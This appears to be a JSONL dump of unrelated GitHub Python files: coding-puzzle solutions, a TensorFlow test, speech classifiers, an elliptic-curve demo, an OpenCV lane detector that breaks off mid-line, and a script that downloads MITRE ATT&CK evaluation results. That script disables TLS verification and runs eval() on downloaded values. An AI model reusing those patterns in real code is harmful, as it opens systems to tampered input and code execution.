ctx.decode(cose_encrypt_bytes, keys=[secret_key])\nprint(f\"\\nDecrypted Payload: {result}\")\nassert result == b'This is a real firmware image.'\nprint(\"Successfully decrypted\")\n","repo_name":"suit-wg/suit-firmware-encryption","sub_path":"examples/validate_aeskw_suit_encryption_info.py","file_name":"validate_aeskw_suit_encryption_info.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"42673743812","text":"#!/usr/bin/env checkio --domain=py run triangle-angles\n\n# You are given the lengths for each side on a triangle. You need to find all three angles for this triangle. If the given side lengths cannot form a triangle (or form a degenerated triangle), then you must return all angles as 0 (zero). The angles should be represented as a list of integers inascending order. Each angle is measured in degrees and rounded to the nearest integer number (Standard mathematical rounding).\n# \n# \n# \n# Input:The lengths of the sides of a triangle as integers.\n# \n# Output:Angles of a triangle in degrees as sorted list of integers.\n# \n# Precondition:\n# 0 < a,b,c ≤ 1000\n# \n# \n# END_DESC\n\nfrom typing import List\nimport math\n\n\ndef checkio(a: int, b: int, c: int) -> List[int]:\n\n if (a+b <= c) or (b+c <= a) or (c+a <= b):\n return [0, 0, 0]\n\n angle_a = math.acos((b**2+c**2-a**2)/(2*b*c)) / math.pi * 180\n angle_b = math.acos((a**2+c**2-b**2)/(2*a*c)) / math.pi * 180\n angle_c = math.acos((a**2+b**2-c**2)/(2*a*b)) / math.pi * 180\n # print('a: {}, b: {}, c: {}'.format(angle_a, angle_b, angle_c))\n li = [angle_a, angle_b, angle_c]\n ans_int = [int(round(x)) for x in li]\n ans = sorted(ans_int)\n\n # print(ans)\n return ans\n\n\nif __name__ == '__main__':\n\n # These \"asserts\" using only for self-checking and not necessary for auto-testing\n print(\"Example:\")\n print(checkio(4, 4, 4))\n # print(checkio(3, 4, 5))\n # print(checkio(2, 2, 5))\n\n assert checkio(4, 4, 4) == [60, 60, 60], \"All sides are equal\"\n assert checkio(3, 4, 5) == [37, 53, 90], \"Egyptian triangle\"\n assert checkio(2, 2, 5) == [0, 0, 0], \"It's can not be a triangle\"\n print(\"Coding complete? Click 'Check' to earn cool rewards!\")","repo_name":"todatech/checkio","sub_path":"py_checkio_solutions/Blizzard/triangle_angles.py","file_name":"triangle_angles.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36861683992","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom tensorflow.core.protobuf import config_pb2\nfrom tensorflow.python import pywrap_tensorflow\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import variables\nfrom tensorflow.python.platform import test\n\n\nclass StatSummarizerTest(test.TestCase):\n\n def testStatSummarizer(self):\n with ops.Graph().as_default() as graph:\n matrix1 = constant_op.constant([[3., 3.]], name=r\"m1\")\n matrix2 = constant_op.constant([[2.], [2.]], name=r\"m2\")\n product = math_ops.matmul(matrix1, matrix2, name=r\"product\")\n\n graph_def = graph.as_graph_def()\n ss = pywrap_tensorflow.NewStatSummarizer(graph_def.SerializeToString())\n\n with self.cached_session() as sess:\n sess.run(variables.global_variables_initializer())\n\n for _ in range(20):\n run_metadata = config_pb2.RunMetadata()\n run_options = config_pb2.RunOptions(\n trace_level=config_pb2.RunOptions.FULL_TRACE)\n sess.run(product, options=run_options, run_metadata=run_metadata)\n\n ss.ProcessStepStatsStr(run_metadata.step_stats.SerializeToString())\n\n output_string = ss.GetOutputString()\n\n print(output_string)\n\n # Test it recorded running the expected number of times.\n self.assertRegexpMatches(output_string, r\"count=20\")\n\n # Test that a header line got printed.\n self.assertRegexpMatches(output_string, r\"====== .* ======\")\n\n # Test that the nodes we added were analyzed.\n # The line for the op should contain both the op type (MatMul)\n # and the name of the node (product)\n self.assertRegexpMatches(output_string, r\"MatMul.*product\")\n self.assertRegexpMatches(output_string, r\"Const.*m1\")\n self.assertRegexpMatches(output_string, r\"Const.*m2\")\n\n # Test that a CDF summed to 100%\n self.assertRegexpMatches(output_string, r\"100\\.\")\n\n pywrap_tensorflow.DeleteStatSummarizer(ss)\n\n\nif __name__ == \"__main__\":\n test.main()\n","repo_name":"DeepRec-AI/DeepRec","sub_path":"tensorflow/contrib/stat_summarizer/python/stat_summarizer_test.py","file_name":"stat_summarizer_test.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":895,"dataset":"github-code","pt":"31"} +{"seq_id":"108668691","text":"import torch\nfrom torch import nn\nfrom torch.nn.utils.rnn import pack_padded_sequence\n\n\n#####################\n# LINEAR CLASSIFIER #\n#####################\nclass LinearClassifier(nn.Module):\n def __init__(self, input_dim, class_num, task, dconfig, sequencial=False):\n super(LinearClassifier, self).__init__()\n \n output_dim = class_num\n hidden_size = dconfig['hidden_size']\n drop = dconfig['drop']\n self.sequencial = sequencial\n self.select_hidden = dconfig['select_hidden']\n self.weight = nn.Parameter(torch.ones(12) / 12)\n\n if self.sequencial: \n self.rnn = nn.GRU(input_size=input_dim, hidden_size=hidden_size, num_layers=1, dropout=0.1,\n batch_first=True, bidirectional=False)\n self.dense1 = nn.Linear(hidden_size, hidden_size)\n else:\n self.dense1 = nn.Linear(input_dim, hidden_size)\n\n self.dense2 = nn.Linear(hidden_size, hidden_size)\n self.drop1 = nn.Dropout(p=drop)\n self.drop2 = nn.Dropout(p=drop)\n\n self.out = nn.Linear(hidden_size, output_dim)\n\n self.act_fn = torch.nn.functional.relu\n self.out_fn = nn.LogSoftmax(dim=-1)\n self.criterion = nn.CrossEntropyLoss(ignore_index=-100)\n\n\n def statistic(self, probabilities, labels, label_mask):\n assert(len(probabilities.shape) > 1)\n assert(probabilities.unbind(dim=-1)[0].shape == labels.shape)\n assert(labels.shape == label_mask.shape)\n\n valid_count = label_mask.sum()\n correct_count = ((probabilities.argmax(dim=-1) == labels).type(torch.cuda.LongTensor) * label_mask).sum()\n return correct_count, valid_count\n\n\n def forward(self, features, labels=None, label_mask=None):\n # features from mockingjay: (batch_size, layer, seq_len, feature)\n # features from baseline: (batch_size, seq_len, feature)\n # labels: (batch_size, seq_len), frame by frame classification\n batch_size = features.size(0)\n layer_num = features.size(1) if len(features.shape) == 4 else None\n seq_len = features.size(2) if len(features.shape) == 4 else features.size(1)\n feature_dim = features.size(3) if len(features.shape) == 4 else features.size(2)\n\n if len(features.shape) == 4:\n # compute mean on mockingjay representations if given features from mockingjay\n if self.select_hidden == 'last':\n features = features[:, -1, :, :]\n elif self.select_hidden == 'first':\n features = features[:, 0, :, :]\n elif self.select_hidden == 'average':\n features = features.mean(dim=1) # now simply average the representations over all layers, (batch_size, seq_len, feature)\n elif self.select_hidden == 'weighted_sum':\n features = features.transpose(0, 1).reshape(layer_num, -1)\n features = torch.matmul(self.weight[:layer_num], features).reshape(batch_size, seq_len, feature_dim)\n elif self.select_hidden == 'weighted_sum_norm':\n weights = nn.functional.softmax(self.weight[:layer_num], dim=-1)\n features = features.transpose(0, 1).reshape(layer_num, -1)\n features = torch.matmul(weights, features).reshape(batch_size, seq_len, feature_dim)\n else:\n raise NotImplementedError('Feature selection mode not supported!')\n\n # since the down-sampling (float length be truncated to int) and then up-sampling process\n # can cause a mismatch between the seq lenth of mockingjay representation and that of label\n # we truncate the final few timestamp of label to make two seq equal in length\n truncated_length = min(features.size(1), labels.size(-1))\n features = features[:, :truncated_length, :]\n labels = labels[:, :truncated_length]\n label_mask = label_mask[:, :truncated_length]\n \n if self.sequencial:\n features, h_n = self.rnn(features)\n\n hidden = self.dense1(features)\n hidden = self.drop1(hidden)\n hidden = self.act_fn(hidden)\n\n hidden = self.dense2(hidden)\n hidden = self.drop2(hidden)\n hidden = self.act_fn(hidden)\n\n logits = self.out(hidden)\n prob = self.out_fn(logits)\n \n if labels is not None:\n assert(label_mask is not None), 'When frame-wise labels are provided, validity of each timestamp should also be provided'\n labels_with_ignore_index = 100 * (label_mask - 1) + labels * label_mask\n\n # cause logits are in (batch, seq, class) and labels are in (batch, seq)\n # nn.CrossEntropyLoss expect to have (N, class) and (N,) as input\n # here we flatten logits and labels in order to apply nn.CrossEntropyLoss\n class_num = logits.size(-1)\n loss = self.criterion(logits.reshape(-1, class_num), labels_with_ignore_index.reshape(-1))\n \n # statistic for accuracy\n correct, valid = self.statistic(prob, labels, label_mask)\n\n return loss, prob.detach().cpu(), correct.detach().cpu(), valid.detach().cpu()\n\n return prob\n\n\nclass RnnClassifier(nn.Module):\n def __init__(self, input_dim, class_num, task, dconfig):\n # The class_num for regression mode should be 1\n\n super(RnnClassifier, self).__init__()\n self.config = dconfig\n self.weight = nn.Parameter(torch.ones(12) / 12)\n\n drop = self.config['drop']\n self.dropout = nn.Dropout(p=drop)\n\n linears = []\n last_dim = input_dim\n for linear_dim in self.config['pre_linear_dims']:\n linears.append(nn.Linear(last_dim, linear_dim))\n last_dim = linear_dim\n self.pre_linears = nn.ModuleList(linears)\n\n hidden_size = self.config['hidden_size']\n self.rnn = nn.GRU(input_size=last_dim, hidden_size=hidden_size, num_layers=1, dropout=drop,\n batch_first=True, bidirectional=False)\n\n linears = []\n last_dim = hidden_size\n for linear_dim in self.config['post_linear_dims']:\n linears.append(nn.Linear(last_dim, linear_dim))\n last_dim = linear_dim\n self.post_linears = nn.ModuleList(linears)\n\n self.act_fn = torch.nn.functional.relu\n self.out = nn.Linear(last_dim, class_num)\n \n mode = self.config['mode']\n if mode == 'classification':\n self.out_fn = nn.LogSoftmax(dim=-1)\n self.criterion = nn.CrossEntropyLoss(ignore_index=-100)\n elif mode == 'regression':\n self.criterion = nn.MSELoss()\n else:\n raise NotImplementedError('Only classification/regression modes are supported')\n\n\n def statistic(self, probabilities, labels):\n assert(len(probabilities.shape) > 1)\n assert(probabilities.unbind(dim=-1)[0].shape == labels.shape)\n\n valid_count = torch.LongTensor([len(labels)])\n correct_count = ((probabilities.argmax(dim=-1) == labels).type(torch.LongTensor)).sum()\n return correct_count, valid_count\n\n\n def forward(self, features, labels=None, valid_lengths=None):\n assert(valid_lengths is not None), 'Valid_lengths is required.'\n # features from mockingjay: (batch_size, layer, seq_len, feature)\n # features from baseline: (batch_size, seq_len, feature)\n # labels: (batch_size,), one utterance to one label\n # valid_lengths: (batch_size, )\n batch_size = features.size(0)\n layer_num = features.size(1) if len(features.shape) == 4 else None\n seq_len = features.size(2) if len(features.shape) == 4 else features.size(1)\n feature_dim = features.size(3) if len(features.shape) == 4 else features.size(2)\n\n select_hidden = self.config['select_hidden']\n if len(features.shape) == 4:\n # compute mean on mockingjay representations if given features from mockingjay\n if select_hidden == 'last':\n features = features[:, -1, :, :]\n elif select_hidden == 'first':\n features = features[:, 0, :, :]\n elif select_hidden == 'average':\n features = features.mean(dim=1) # now simply average the representations over all layers, (batch_size, seq_len, feature)\n elif select_hidden == 'weighted_sum':\n features = features.transpose(0, 1).reshape(layer_num, -1)\n features = torch.matmul(self.weight[:layer_num], features).reshape(batch_size, seq_len, feature_dim)\n elif select_hidden == 'weighted_sum_norm':\n weights = nn.functional.softmax(self.weight[:layer_num], dim=-1)\n features = features.transpose(0, 1).reshape(layer_num, -1)\n features = torch.matmul(weights, features).reshape(batch_size, seq_len, feature_dim)\n else:\n raise NotImplementedError('Feature selection mode not supported!')\n\n sample_rate = self.config['sample_rate']\n features = features[:, torch.arange(0, seq_len, sample_rate), :]\n valid_lengths /= sample_rate\n\n for linear in self.pre_linears:\n features = linear(features)\n features = self.act_fn(features)\n features = self.dropout(features)\n\n packed = pack_padded_sequence(features, valid_lengths, batch_first=True, enforce_sorted=True)\n _, h_n = self.rnn(packed)\n hidden = h_n[-1, :, :]\n # cause h_n directly contains info for final states\n # it will be easier to use h_n as extracted embedding\n \n for linear in self.post_linears:\n hidden = linear(hidden)\n hidden = self.act_fn(hidden)\n hidden = self.dropout(hidden)\n\n logits = self.out(hidden)\n\n mode = self.config['mode']\n if mode == 'classification':\n result = self.out_fn(logits)\n # result: (batch_size, class_num)\n elif mode == 'regression':\n result = logits.reshape(-1)\n # result: (batch_size, )\n \n if labels is not None:\n loss = self.criterion(result, labels)\n\n # statistic for accuracy\n if mode == 'classification':\n correct, valid = self.statistic(result, labels)\n elif mode == 'regression':\n # correct and valid has no meaning when in regression mode\n # just to make the outside wrapper can correctly function\n correct, valid = torch.LongTensor([1]), torch.LongTensor([1])\n\n return loss, result.detach().cpu(), correct, valid\n\n return result\n\n\nclass example_classifier(nn.Module):\n def __init__(self, input_dim, hidden_dim, class_num):\n super(example_classifier, self).__init__()\n self.rnn = nn.GRU(input_size=input_dim, hidden_size=hidden_dim, num_layers=1, dropout=0.3,\n batch_first=True, bidirectional=False)\n\n self.out = nn.Linear(hidden_dim, class_num)\n self.out_fn = nn.LogSoftmax(dim=-1)\n self.criterion = nn.CrossEntropyLoss()\n\n def forward(self, features, labels):\n # features: (batch_size, seq_len, feature)\n # labels: (batch_size,), one utterance to one label\n\n _, h_n = self.rnn(features)\n hidden = h_n[-1, :, :]\n logits = self.out(hidden)\n result = self.out_fn(logits)\n loss = self.criterion(result, labels)\n\n return loss\n\n","repo_name":"andi611/Mockingjay-Speech-Representation","sub_path":"downstream/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":11481,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"31"} +{"seq_id":"43581677987","text":"'''\r\nDavid Girard Sr Product Manager Trend Micro\r\nGet MITRE Evaluation #4 raw json results\r\nMarch 31st 2022\r\ntested with Python 3.9 but most 3.x should works\r\n'''\r\nimport requests # pip3 install requests\r\nimport json\r\nfrom openpyxl import Workbook # pip3 install openpyxl\r\nfrom openpyxl.styles import Font, Color\r\n\r\n\r\nbase_url = \"https://attackevals.mitre-engenuity.org/api/export/?participant=\"\r\nsuffix = \"&adversary=wizard-spider-sandworm\" #each json file on mitre-engenuity.org got this\r\nfilesuffix = '_wizard-spider-sandworm.json'\r\n\r\n#list of vendors in this year eval\r\nvendors = ['TrendMicro','Bitdefender', 'CheckPoint', 'Cisco', 'CrowdStrike', 'Cybereason', 'CyCraft', 'Cylance',\r\n 'Cynet', 'Deepinstinct', 'Elastic','ESET', 'Fidelis', 'FireEye', 'Fortinet','f-secure', 'Malwarebytes',\r\n 'McAfee', 'Microsoft', 'PaloAltoNetworks', 'Qualys', 'Rapid7', 'ReaQta', 'SentinelOne', 'Somma',\r\n 'Sophos', 'Symantec', 'AhnLab', 'Uptycs', 'VMware']\r\n\r\ndef getResults(v):\r\n print(v+suffix)\r\n r_file = requests.get(base_url + v + suffix, verify=False)\r\n json_data = json.loads(r_file.text)\r\n with open('data/' + v+filesuffix, 'w', encoding='utf-8') as f:\r\n json.dump(json_data, f, ensure_ascii=False, indent=4)\r\n\r\ndef downloadRawData():\r\n for vendor in vendors:\r\n getResults(vendor)\r\n\r\ndef buildSummary():\r\n # build a summary in an excel shet\r\n wb = Workbook()\r\n sh = wb.active\r\n # set the columns names\r\n sh['A1'] = \"Participant\"\r\n cols = ['Total_Substeps', 'Total_Detections',\r\n 'Analytic_Detections', 'Telemetry_Detections','Analytic_Coverage','Telemetry_Coverage','Visibility']\r\n col_start = 2\r\n for i in range(0, len(cols)):\r\n sh.cell(1, col_start+i).value = cols[i]\r\n sh.cell(1, col_start + i +1).value = \"Linux Capability\"\r\n sh.cell(1, col_start + i + 2).value = \"Protection Capability\"\r\n sh.cell(1, col_start + i + 3).value = \"Analytic Coverage %\"\r\n sh.cell(1, col_start + i + 4).value = \"Telemetry Coverage %\"\r\n sh.cell(1, col_start + i + 5).value = \"Visibility %\"\r\n\r\n # now get the vendor summary data in the sheet\r\n row = 2\r\n red_text = Font(color=\"00FF0000\")\r\n for vendor in vendors:\r\n print(vendor) # just to see it'S processing or crashing\r\n\r\n with open('data/' + vendor+filesuffix, encoding='utf-8') as f:\r\n data = json.load(f)\r\n icol = 1\r\n i = 1\r\n # Participant = vendor\r\n sh.cell(row, icol).value = data[0]['Participant_Name']\r\n # get the summary data under Aggregates\r\n for col in cols:\r\n sh.cell(row,icol + i).value = data[0]['Adversaries'][0]['Aggregate_Data']['Aggregates'][col]\r\n i=i+1\r\n # Add the capabilities.\r\n if 'Linux Capability' in data[0]['Adversaries'][0]['Participant_Capabilities']:\r\n sh.cell(row, icol + i).value = \"Yes\"\r\n else:\r\n sh.cell(row, icol + i).value = \"No\"\r\n sh.cell(row, icol + i).font = red_text\r\n\r\n if 'Protection Capability' in data[0]['Adversaries'][0]['Participant_Capabilities']:\r\n sh.cell(row, icol + i +1 ).value = \"Yes\"\r\n else:\r\n sh.cell(row, icol + i + 1).value = \"No\"\r\n sh.cell(row, icol + i + 1).font = red_text\r\n # Add the %\r\n percent_analytics = eval(data[0]['Adversaries'][0]['Aggregate_Data']['Aggregates'][\"Analytic_Coverage\"]+ '*100')\r\n sh.cell(row, icol + i + 2).value = percent_analytics\r\n\r\n percent_telemetry = eval(data[0]['Adversaries'][0]['Aggregate_Data']['Aggregates'][\"Telemetry_Coverage\"]+ '*100')\r\n sh.cell(row, icol + i + 3).value = percent_telemetry\r\n\r\n percent_visibility = eval(data[0]['Adversaries'][0]['Aggregate_Data']['Aggregates'][\"Visibility\"]+ '*100')\r\n sh.cell(row, icol + i + 4).value = percent_visibility\r\n f.close()\r\n row=row +1\r\n\r\n # add your improvements, like creating charts\r\n\r\n # change the name to watever you like\r\n wb.save('data/wizard-spider-sandworm.xlsx')\r\n\r\n# simple : download and build summary.\r\ndownloadRawData()\r\nbuildSummary()\r\n# add your steps here... pandas maybe, or upload JSON's to Elastic\r\n\r\n","repo_name":"girdav01/utils","sub_path":"mitre_results2022.py","file_name":"mitre_results2022.py","file_ext":"py","file_size_in_byte":4300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11016002506","text":"class Solution:\n def reachNumber(self, target):\n \"\"\"\n :type target: int\n :rtype: int\n 其实我没有懂这题什么意思\n ??\n \"\"\"\n if target == 0:\n return 0\n\n if target < 0:\n target = abs(target)\n\n total_length =0\n i = 0\n while(total_length < target):\n i += 1\n total_length += i\n\n # 若走到第i步正好到达target位置,则需要i - 1(因为在for循环时多加了1)\n # 若走到第i步时,多了奇数个数,则需要两步\n # 若走到第i步时,多了偶数个数,则需要一步\n if total_length == target:\n return i\n\n else:\n\n delta = total_length - target\n if delta % 2 == 0:\n return i\n else:\n if i % 2 == 0:\n return i+1\n else:\n return i + 2\n\n\n\n def xx(self,num):\n import math\n print((math.sqrt(8.00*abs(num)+1)-1)/2)\n print(math.ceil((math.sqrt(8.00*abs(num)+1)-1)/2))\n\n\ns = Solution()\nprint(s.reachNumber(4))\nprint(s.xx(4))","repo_name":"NeilWangziyu/Leetcode_py","sub_path":"reachNumber.py","file_name":"reachNumber.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"7891798846","text":"from Utils import SCORES_FILE_NAME\n\nfrom flask import Flask\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef score_server():\n try:\n with open(SCORES_FILE_NAME, \"r\") as file:\n score = file.read()\n return f\"\"\"\n \n \n Scores Game\n \n \n

    The score is
    {score}

    \n \n \n \"\"\"\n except FileNotFoundError:\n return \"\"\"\n \n \n Scores Game\n \n \n

    ERROR

    \n \n \n \"\"\"\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"vitalydono/world-of-games","sub_path":"MainScores.py","file_name":"MainScores.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74950264726","text":"import os\nweight = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]\ntable = ['1', '0', 'x', '9', '8', '7', '6', '5', '4', '3', '2']\n\nid_num = input(\"Please input your ID number: \")\n\nsum = 0\nfor i, num in enumerate(id_num):\n if i >= len(weight):\n break\n sum += int(num) * weight[i]\n\nhash_num = table[sum % 11]\nprint('The hash num is: ', hash_num)\nos.system('pause')","repo_name":"thekips/tools","sub_path":"utils/idcard_hash.py","file_name":"idcard_hash.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13735581832","text":"'''\nQuestion: \n 142. Linked List Cycle II\n\nDescrition: \n Given a linked list, return the node where the cycle begins. If there is no cycle, return null.\n To represent a cycle in the given linked list, we use an integer pos which represents the position (0-indexed) in the linked list where tail connects to. \n If pos is -1, then there is no cycle in the linked list. Note: Do not modify the linked list.\n\nExample:\n\n 1.Input: head = [3,2,0,-4], pos = 1\n\tOutput: tail connects to node index 1\n\tExplanation: There is a cycle in the linked list, where tail connects to the second node.\n\n 2.Input: head = [1,2], pos = 0\n\tOutput: tail connects to node index 0\n\tExplanation: There is a cycle in the linked list, where tail connects to the first node.\n\n 3.Input: head = [1], pos = -1\n\tOutput: no cycle\n\tExplanation: There is no cycle in the linked list.\n'''\n\n#Python code\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def detectCycle(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n #Solution\n #https://www.cnblogs.com/zuoyuan/p/3701877.html\n #解题思路:这道题有点意思。首先使用快慢指针技巧,如果fast指针和slow指针相遇,则说明链表存在环路。\n #在fast指针和slow指针相遇后,fast指针不动,slow指针回到head,然后slow指针和fast指针同时向前走,\n #只不过这一次两个指针都是一步一步向前走。两个指针相遇的节点就是环路的起点。\n #原理说明:图中,head到环路起点的距离为K,起点到fast和slow的相遇点的距离为M,环路周长为L。\n #假设,在fast和slow相遇时,fast走过了Lfast,slow走过了Lslow。根据题意:\n #Lslow = K + M;Lfast = K + M + n * L(n为正整数)Lfast = 2 * Lslow\n #可以推出:Lslow=n*L;K=n*L-M,则当slow重新回到head,而fast还在相遇点,slow和fast都向前走,且每次走一个节点。\n #则slow从head走到起点走了K,而fast从相遇点出发也走了K,而fast向前走了距离K后到了哪里呢?由于K=(n-1)*L+(L-M), #所以fast转了n-1圈,再走L-M,也到了起点。这样起点就找到了。\n if head == None or head.next == None:\n return None\n slow = fast = head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n if fast == slow:\n break\n if slow == fast:\n slow = head\n while slow != fast:\n slow = slow.next\n fast = fast.next\n return slow\n return None\n\n ","repo_name":"ChenxiiCheng/Python-LC-Solution","sub_path":"Q142-Linked List Cycle ||-Medium.py","file_name":"Q142-Linked List Cycle ||-Medium.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"8152328037","text":"from GUI.input_name import *\n\n\nclass basedesk():\n def __init__(self, master):\n self.root = master\n self.root.config()\n self.root.title(\"Snake and Ladder\")\n self.root.geometry(\"1000x800+0+0\") # 400wight, 200height\n self.root.resizable(False, False) # 不可拖动窗口改变大小\n NameEntryForm(self.root)\n\n\nif __name__ == '__main__':\n root = ttk.Window()\n basedesk(root)\n root.mainloop()\n","repo_name":"HaodongYu910/SS_Assignment","sub_path":"GUI/welcom_page.py","file_name":"welcom_page.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43703341305","text":"import matplotlib.pyplot as plt\nfrom copy import deepcopy\nfrom ecc import Point, EllipticCurve\n# p = Point(5,1)\n# k = 17\n# E = EllipticCurve(a = 2, b = 2, k = k)\n# t_inf = (E.mult(p, 19))\n# # print(E.onCurve(t_inf.x, t_inf.y))\n# # print(E.onCurve(p.x, p.y))\n\n# q = Point(6, 3)\n# q_inf = (E.mult(q, 19))\n# print(E.onCurve(q_inf.x, q_inf.y))\n\nk = 149\nE = EllipticCurve(a = -4, b = 10, k = k)\np = Point(29, 61)\nq = Point(32, 67)\nprint(E)\nprint(\"R : (%s) \" % E.add(p, q))\nprint(\"S : (%s) \" % E.mult(p, 3))\n# print(E.onCurve(p.x, p.y))\nassert(E.onCurve(p.x, p.y) == True) # checks that p is on the elliptic curve\nprint(E.order())\npts = (E.points)\nx = []\ny = []\n\nfor p in pts:\n print(p.x, p.y)\n x.append(p.x)\n y.append(p.y)\n\nplt.scatter(x, y)\nplt.axhline(y=k/2)\nplt.grid()\nplt.show()\n\nplt.close()\n","repo_name":"chinying/compsec-cw1","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23570071192","text":"import numpy as np\r\nimport cv2\r\n\r\n# Reading the input image\r\nimg = cv2.imread(\"C:/Users\\Eslam.Wael\\Desktop/Capture.PNG\")\r\n# Using median filter to make the lane more recognizable\r\nimg = cv2.medianBlur(img, 5)\r\n\r\n# Getting the height and width of the photo\r\nheight, width = img.shape[:2]\r\n\r\n\r\n# Function to return the parking slot region #####################\r\n\r\n\r\ndef parking_slot_region(img, vertices):\r\n\r\n # defining a blank mask to start with\r\n mask = np.zeros_like(img)\r\n \r\n # defining a 3 channel or 1 channel color to fill the mask with depending on the input image\r\n if len(img.shape) > 2:\r\n channel_count = img.shape[2] # i.e. 3 or 4 depending on your image\r\n ignore_mask_color = (255,) * channel_count\r\n else:\r\n ignore_mask_color = 255\r\n\r\n # filling pixels inside the polygon defined by \"vertices\" with the fill color\r\n cv2.fillPoly(mask, vertices, ignore_mask_color)\r\n\r\n # returning the image only where mask pixels are nonzero\r\n masked_image = cv2.bitwise_and(img, mask)\r\n return masked_image\r\n\r\n# Function to detect the yellow lanes in the photo #####################\r\n\r\ndef detect_yellow (img):\r\n lower_range_yellow = np.array([22, 60, 200])\r\n upper_range_yellow = np.array([60, 255, 255])\r\n #kernel = np.ones((5,5),np.uint8)\r\n\r\n # Convert to HSV\r\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\r\n mask = cv2.inRange(hsv, lower_range_yellow, upper_range_yellow)\r\n\r\n # Remove the detected vertical lines\r\n kernel = np.array([0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0], np.uint8)\r\n mask = cv2.erode(mask, kernel, iterations=6)\r\n\r\n # Return vertical lines\r\n kernel = np.array([0, 0, 1, 0, 1, 0, 1, 0, 0], np.uint8)\r\n #mask=cv2.dilate(mask,kernel,iterations=3)\r\n edges = cv2.Canny(mask, 100, 200)\r\n edges = cv2.dilate(edges, kernel, iterations=1)\r\n _, contours, hierarchy = cv2.findContours(edges, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n cv2.drawContours(edges, contours, -1, (255, 255, 255), 3)\r\n output = cv2.bitwise_and(img, img, mask=mask)\r\n return mask, output, edges\r\n\r\n\r\n# Function to detect the white lanes in the photo #####################\r\n\r\n\r\ndef detect_white (img):\r\n\r\n # HSV ranges for White\r\n lower_range_white = np.array([0, 210, 0])\r\n upper_range_white = np.array([255, 255, 255])\r\n\r\n # Convert to HSV\r\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HLS)\r\n mask = cv2.inRange(hsv, lower_range_white, upper_range_white)\r\n\r\n # Remove detected vertical lines\r\n kernel = np.array([0, 0, 0, 1, 1, 1, 0, 0, 0], np.uint8)\r\n mask= cv2.erode(mask, kernel, iterations=6)\r\n\r\n # Return vertical lines\r\n kernel = np.array([0, 0, 1, 0, 1, 0, 1, 0, 0], np.uint8)\r\n #mask=cv2.dilate(mask,kernel,iterations=3)\r\n edges = cv2.Canny(mask, 100, 200)\r\n edges = cv2.dilate(edges, kernel, iterations=1)\r\n _, contours, hierarchy = cv2.findContours(edges,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE) \r\n cv2.drawContours(edges, contours, -1, (255, 255, 255), 3)\r\n output = cv2.bitwise_and(img, img, mask=mask)\r\n return mask, output, edges\r\n\r\n\r\n# Function to return the coordinates of the 2 parking slot lines #####################\r\n\r\n\r\ndef getFourPoints (edges):\r\n\r\n y = edges.nonzero()[0]\r\n x = edges.nonzero()[1]\r\n\r\n y_min = y[np.argmin(y)]\r\n x_y_min = x[np.argmin(y)]\r\n \r\n y_max = y[np.argmax(y)]\r\n x_y_max = x[np.argmax(y)]\r\n \r\n # Third point\r\n y_x_min = y[np.argmin(x)]\r\n x_min = x[np.argmin(x)]\r\n third = np.array([y_x_min, x_min])\r\n \r\n # Last point\r\n y_x_max = y[np.argmax(x)]\r\n x_max = x[np.argmax(x)]\r\n forth = np.array([y_x_max,x_max])\r\n \r\n if abs(x_y_min - x_min) < abs(x_y_min - x_max):\r\n first = np.array([y_min, x_y_min])\r\n second = np.array([y_min, x_max-(abs(x_y_min-x_min))])\r\n else:\r\n first = np.array([y_min, x_min+(abs(x_y_min-x_max))])\r\n second = np.array([y_min, x_y_min])\r\n\r\n return first, second, third, forth\r\n\r\n\r\nmask_yellow, output_yellow, edges = detect_yellow(img)\r\nmask_white, output_white, edges2 = detect_white(img)\r\nedges = cv2.bitwise_or(edges, edges2)\r\n\r\n# Getting the coordinates of the 2 parking slot lines\r\nfirst, second, third, forth = getFourPoints(edges)\r\n# Define the parking slot \"Our region of interest\"\r\n\r\nparking_slot = [\r\n (0, height),\r\n (first[1], first[0]),\r\n (second[1], second[0]),\r\n (width, height)\r\n]\r\n\r\ncropped_image = parking_slot_region(\r\n img,\r\n np.array([parking_slot], np.int32),\r\n)\r\n\r\ncv2.imshow('cropped_imag', cropped_image)\r\ncv2.imshow(\"images 